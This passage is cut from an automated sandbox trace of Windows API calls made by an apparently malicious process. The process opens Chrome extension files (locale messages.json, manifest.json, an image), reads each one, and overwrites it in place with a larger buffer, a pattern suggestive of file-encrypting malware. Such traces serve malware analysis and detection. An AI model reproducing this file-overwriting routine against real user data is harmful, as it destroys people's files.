lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.504] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f37ed8, nNumberOfBytesToRead=0xaa, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37ed8*, lpNumberOfBytesRead=0x345f2bc*=0xaa, lpOverlapped=0x0) returned 1 [0144.505] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.506] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x632, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x632, lpOverlapped=0x0) returned 1 [0144.506] CloseHandle (hObject=0x1f0) returned 1 [0144.506] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.508] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.508] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x112dc [0144.509] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.509] ReleaseMutex (hMutex=0x168) returned 1 [0144.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flapper.gif", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0144.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flapper.gif", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flapper.gif", lpUsedDefaultChar=0x0) returned 11 [0144.509] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0147.984] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x102dc [0147.984] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0147.994] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x102dc [0147.994] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0147.994] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0147.994] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0147.994] CloseHandle (hObject=0x1f0) returned 1 [0147.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0147.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0147.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x52a [0147.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0147.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.997] ReleaseMutex (hMutex=0x168) returned 1 [0147.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0147.997] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x52a, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x345f2bc*=0x52a, lpOverlapped=0x0) returned 1 [0148.003] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.003] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xab2, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f2d0*=0xab2, lpOverlapped=0x0) returned 1 [0148.003] CloseHandle (hObject=0x1f0) returned 1 [0148.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x269 [0148.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.006] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.006] ReleaseMutex (hMutex=0x168) returned 1 [0148.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.006] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x269, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x269, lpOverlapped=0x0) returned 1 [0148.020] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.020] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x7f1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x7f1, lpOverlapped=0x0) returned 1 [0148.020] CloseHandle (hObject=0x1f0) returned 1 [0148.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.022] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.022] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x279 [0148.022] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.022] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.023] ReleaseMutex (hMutex=0x168) returned 1 [0148.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.023] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x279, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x279, lpOverlapped=0x0) returned 1 [0148.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.025] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x801, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x801, lpOverlapped=0x0) returned 1 [0148.025] CloseHandle (hObject=0x1f0) returned 1 [0148.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x284 [0148.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.030] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.030] ReleaseMutex (hMutex=0x168) returned 1 [0148.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x284, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x284, lpOverlapped=0x0) returned 1 [0148.034] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.034] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x80c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x80c, lpOverlapped=0x0) returned 1 [0148.034] CloseHandle (hObject=0x1f0) returned 1 [0148.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x282 [0148.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.036] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.037] ReleaseMutex (hMutex=0x168) returned 1 [0148.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.037] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x282, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x282, lpOverlapped=0x0) returned 1 [0148.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.046] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x80a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x80a, lpOverlapped=0x0) returned 1 [0148.046] CloseHandle (hObject=0x1f0) returned 1 [0148.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x280 [0148.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.048] ReleaseMutex (hMutex=0x168) returned 1 [0148.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.048] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x280, lpOverlapped=0x0) returned 1 [0148.058] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.058] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x808, lpOverlapped=0x0) returned 1 [0148.058] CloseHandle (hObject=0x1f0) returned 1 [0148.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0148.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xec [0148.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.731] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.732] ReleaseMutex (hMutex=0x168) returned 1 [0148.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.732] ReadFile (in: hFile=0x1dc, lpBuffer=0x2697208, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697208*, lpNumberOfBytesRead=0x345f2bc*=0xec, lpOverlapped=0x0) returned 1 [0148.733] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.733] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x674, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x674, lpOverlapped=0x0) returned 1 [0148.733] CloseHandle (hObject=0x1dc) returned 1 [0148.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0148.734] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.735] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x121 [0148.735] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0148.735] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.735] ReleaseMutex (hMutex=0x168) returned 1 [0148.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0148.735] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec7468, nNumberOfBytesToRead=0x121, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec7468*, lpNumberOfBytesRead=0x345f2bc*=0x121, lpOverlapped=0x0) returned 1 [0148.736] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0148.736] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6a9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x6a9, lpOverlapped=0x0) returned 1 [0148.736] CloseHandle (hObject=0x1dc) returned 1 [0148.736] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.143] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0149.143] SetFilePointer (in: 